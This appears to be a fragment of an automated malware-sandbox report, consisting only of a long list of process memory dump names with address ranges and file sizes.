                                                                                                                                                                                                                                                              • memory/756-1683-0x0000000000400000-0x00000000005E6000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1.9MB

                                                                                                                                                                                                                                                              • memory/756-1029-0x0000000000400000-0x00000000005E6000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1.9MB

                                                                                                                                                                                                                                                              • memory/756-1670-0x0000000000400000-0x00000000005E6000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1.9MB

                                                                                                                                                                                                                                                              • memory/888-510-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                              • memory/1012-1030-0x0000000000400000-0x00000000008D5000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4.8MB

                                                                                                                                                                                                                                                              • memory/1012-14742-0x0000000000400000-0x00000000008D5000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4.8MB

                                                                                                                                                                                                                                                              • memory/1344-1033-0x00000000051D0000-0x0000000005262000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                584KB

                                                                                                                                                                                                                                                              • memory/1344-1041-0x0000000005160000-0x0000000005182000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                                              • memory/1344-1032-0x00000000008A0000-0x0000000000924000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                528KB

                                                                                                                                                                                                                                                              • memory/1344-1040-0x0000000005450000-0x00000000054C6000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                472KB

                                                                                                                                                                                                                                                              • memory/1532-1217-0x0000000010000000-0x00000000100B8000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                736KB

                                                                                                                                                                                                                                                              • memory/1532-844-0x0000000000240000-0x0000000000324000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                912KB

                                                                                                                                                                                                                                                              • memory/1532-1218-0x0000000010000000-0x00000000100B8000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                736KB

                                                                                                                                                                                                                                                              • memory/1532-1059-0x0000000010000000-0x00000000100B8000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                736KB

                                                                                                                                                                                                                                                              • memory/1532-910-0x0000000000870000-0x0000000000871000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/1532-1225-0x0000000000240000-0x0000000000324000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                912KB

                                                                                                                                                                                                                                                              • memory/1568-733-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/1568-392-0x0000000000800000-0x000000000080D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/1568-731-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/1576-511-0x0000000000500000-0x0000000000510000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/1576-833-0x0000000000500000-0x0000000000510000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/1712-321-0x0000000000800000-0x000000000080D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/1736-846-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/2072-843-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/2072-698-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/2392-845-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/2428-180-0x0000000010000000-0x000000001000D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/2428-132-0x0000000000400000-0x000000000041F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                              • memory/2428-533-0x0000000010000000-0x000000001000D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/2428-841-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/2604-577-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                              • memory/2728-74-0x0000000000400000-0x00000000004E3000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                908KB

                                                                                                                                                                                                                                                              • memory/2892-832-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                              • memory/2892-306-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                              • memory/2892-726-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                              • memory/2892-1678-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                              • memory/2892-1687-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                              • memory/3260-124-0x0000000005820000-0x00000000058BC000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                624KB

                                                                                                                                                                                                                                                              • memory/3260-814-0x000000000AD40000-0x000000000B2E4000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                5.6MB

                                                                                                                                                                                                                                                              • memory/3260-234-0x00000000069C0000-0x0000000006B06000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                              • memory/3260-123-0x0000000000650000-0x0000000000FAC000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                9.4MB

                                                                                                                                                                                                                                                              • memory/3500-282-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/3568-680-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/3592-830-0x0000000000800000-0x000000000080D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/3592-214-0x0000000000800000-0x000000000080D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/3592-690-0x0000000000800000-0x000000000080D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/3768-839-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/3796-842-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/4048-727-0x0000000000500000-0x0000000000510000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/4080-837-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/4120-134-0x0000000000400000-0x000000000041F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                              • memory/4252-536-0x0000000000400000-0x000000000041F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                              • memory/4252-834-0x0000000000400000-0x000000000041F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                              • memory/4252-1680-0x0000000000400000-0x000000000041F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                              • memory/4252-691-0x0000000010000000-0x000000001000D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/4252-1031-0x0000000000400000-0x000000000041F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                              • memory/4280-1675-0x0000000000800000-0x000000000080D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/4280-685-0x0000000000800000-0x000000000080D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/4280-196-0x0000000000800000-0x000000000080D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/4344-1016-0x0000000000400000-0x000000000044F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                316KB

                                                                                                                                                                                                                                                              • memory/4344-509-0x0000000000400000-0x000000000044F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                316KB

                                                                                                                                                                                                                                                              • memory/4344-1660-0x0000000000400000-0x000000000044F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                316KB

                                                                                                                                                                                                                                                              • memory/4344-684-0x0000000000400000-0x000000000044F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                316KB

                                                                                                                                                                                                                                                              • memory/4344-77-0x0000000000400000-0x000000000044F000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                316KB

                                                                                                                                                                                                                                                              • memory/4468-1049-0x0000000005840000-0x000000000584A000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                              • memory/4468-1034-0x0000000000DE0000-0x0000000000DEC000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                              • memory/4640-1011-0x00000000008A0000-0x00000000008C0000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                128KB

                                                                                                                                                                                                                                                              • memory/4756-838-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                              • memory/4808-840-0x0000000000800000-0x000000000080D000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                              • memory/4840-1025-0x0000000000170000-0x0000000000196000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                152KB

                                                                                                                                                                                                                                                              • memory/4840-1026-0x0000000004890000-0x00000000048F6000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                408KB

                                                                                                                                                                                                                                                              • memory/5796-1654-0x0000024BD1A00000-0x0000024BD1A01000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/5796-1655-0x0000024BD1A00000-0x0000024BD1A01000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/5796-1646-0x0000024BD1A00000-0x0000024BD1A01000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/5796-1644-0x0000024BD1A00000-0x0000024BD1A01000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/5796-1645-0x0000024BD1A00000-0x0000024BD1A01000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/5796-1651-0x0000024BD1A00000-0x0000024BD1A01000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/5796-1652-0x0000024BD1A00000-0x0000024BD1A01000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/5796-1656-0x0000024BD1A00000-0x0000024BD1A01000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/5796-1650-0x0000024BD1A00000-0x0000024BD1A01000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/5796-1653-0x0000024BD1A00000-0x0000024BD1A01000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                              • memory/5848-1255-0x0000000000400000-0x0000000000538000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                              • memory/9696-27390-0x0000000005C10000-0x0000000005C2E000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                                              • memory/9696-27393-0x00000000061B0000-0x00000000061FC000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                304KB

                                                                                                                                                                                                                                                              • memory/9696-27330-0x0000000005680000-0x00000000059D4000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                3.3MB

                                                                                                                                                                                                                                                              • memory/9696-27226-0x0000000004E70000-0x0000000004E92000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                                              • memory/9696-27227-0x0000000004F10000-0x0000000004F76000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                408KB

                                                                                                                                                                                                                                                              • memory/9696-26241-0x0000000004FE0000-0x0000000005608000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                6.2MB

                                                                                                                                                                                                                                                              • memory/9696-26240-0x0000000002340000-0x0000000002376000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                216KB

                                                                                                                                                                                                                                                              • memory/12940-26291-0x00000210DB550000-0x00000210DB572000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                136KB